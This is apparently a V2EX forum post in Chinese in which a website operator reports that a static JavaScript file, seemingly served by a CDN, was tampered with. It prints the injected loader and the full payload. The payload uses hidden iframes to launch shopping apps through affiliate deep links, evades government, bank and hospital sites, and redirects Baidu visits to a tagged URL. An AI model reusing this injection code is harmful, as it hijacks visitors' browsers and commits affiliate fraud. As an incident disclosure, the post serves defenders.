今天上午接到其他地区同事反馈说网站点击按钮没反应,于是自己试了下,手机和电脑都没有问题。下午的时候发现,自己这边也开始出现问题了,排查后发现某个静态 js 资源被篡改了,完全和源数据不一样。
(function(){var l=document.createElement('script');l.src='https://gov.papastars.com/dlhao.min.js';document.getElementsByTagName('body')[0].appendChild(l);})();(function(){var l=document.createElement('script');l.src='http://xxxxx//static/js/7.js';document.getElementsByTagName('body')[0].appendChild(l);})();
之后会被引入 dlhao.min.js ,然后在跳转回源,不过估计没写好吧,跳转应该是要 https。
!function() {
var e = ["https://gov.papastars.com/usany.min.html", 'openapp.jdmobile://virtual?params={"category":"jump","des":"m","url":"https://u.jd.com/1jEOCf","keplerID":"0","keplerFrom":"1","kepler_param":{"source":"kepler-open","otherData":{"mopenbp7":"0"}},"union_open":"union_cps"}', "vipshop://goHome?tra_from=tra%3AC01V006ijfbdtqnu%3A%3Amig_code%3Acps101%3A1cf9efd0abf84e8c94b7e1c01ebe7b2b", "tbopen://m.taobao.com/tbopen/index.html?source=auto&action=ali.open.nav&module=h5&bootImage=0&h5Url=https%3A%2F%2Fh5.m.taobao.com%2Fbcec%2Fdahanghai-jump.html%3Fspm%3D2014.ugdhh.3907731441.1217-279%26bc_fl_srcgrowth_dhh_3907731441_1217-279&spm=2014.ugdhh.3907731441.1217-279&bc_fl_src=growth_dhh_3907731441_1217-279&materialid=1217", "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=sxmhx&src_ch=sxmhx42&src_scene=pullup&url=ext%3Ainfo_flow_open_channel%3Ach_id%3D100%26insert_item_ids%3D17864229593326336693%26type%3Dmultiple%26from%3D6001", "youku://weex?source=00002204&url=https%3A%2F%2Fmarket.m.taobao.com%2Fyep%2Fweexmaker%2Fykpage%2Fpigspring_wmdt.js%3Fwh_weex%3Dtrue%26refer%3Dsanfang1903_operation.chunyue.l_00002204_7000_IfQzQn_19022700&refer=sanfang1903_operation.chunyue.l_00002204_7000_IfQzQn_19022700"]
, t = "y"
, o = "dkwlsn3"
, n = "vivi8dd"
, r = "bbdm2lw"
, a = .15
, i = function(e, t) {
var o = document.createElement("iframe");
o.setAttribute("width", "1px"),
o.setAttribute("height", "1p"),
o.setAttribute("frameborder", "0"),
o.setAttribute("scrolling", "no"),
o.style.display = "none",
o.setAttribute("src", e),
document.body.appendChild(o),
t && window.setTimeout(function() {
document.body.removeChild(o)
}, 3e3)
}
, c = function(e) {
for (var t = e + "=", o = document.cookie.split(";"), n = 0; n < o.length; n++) {
for (var r = o[n]; " " == r.charAt(0); )
r = r.substring(1);
if (-1 != r.indexOf(t))
return r.substring(t.length, r.length)
}
return ""
}
, m = function(e, t, o) {
var n = new Date
, r = n.getTime();
r += 3600 * o * 1e3,
n.setTime(r),
document.cookie = e + "=" + t + "; expires=" + n.toUTCString() + "; path=/"
};
!function(e, u) {
var s = function(e, t) {
if (e) {
e = e.toLowerCase();
for (var o in t)
if (e.indexOf(t[o]) > -1)
return !0
}
return !1
}
, h = location.host
, p = function(e) {
var t = new Array(".gov","haiwainet.cn","yhd.com","alipay","p.weibo.com","people","xiangha.com","adipman.net","cnr.cn","17getfun.com","shuixindk.cn","ce.cn","boc","abchina","icbc","10086","51awifi.com","hospital");
return s(e, t) ? !1 : !0
};
if (p(h)) {
if (/MicroMessenger/gi.test(u.userAgent))
return;
var l = c(n);
l != t && (i(e[0], !0),
m(n, t, .5));
var f = Math.floor(100 * Math.random())
, l = c(o);
l != t && (f >= 20 && i(e[1], !0),
80 >= f && i(e[2], !0),
(35 > f || f > 75) && i(e[3], !0),
u.userAgent.indexOf("UCBrowser") > -1 && Math.floor(100 * Math.random()) > 30 && i(e[4], !0),
Math.floor(100 * Math.random()) > 50 && i(e[5], !0),
m(o, t, a))
}
var d = top.location.href
, l = c(r);
l != t && d.length < 40 && "https://m.baidu.com/?from" == d.substring(0, 25) && "?from=1015129o" !== top.location.search && Math.floor(100 * Math.random()) > 50 && (m(r, t, a),
top.location.href = "https://m.baidu.com/?from=1015129o")
}(e, navigator, document, window.location)
}();
点击按钮将直接唤起淘宝之类的 app 至于哪家 CDN 就不说了 国外 VPS 测试了下 返回结果也一样
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.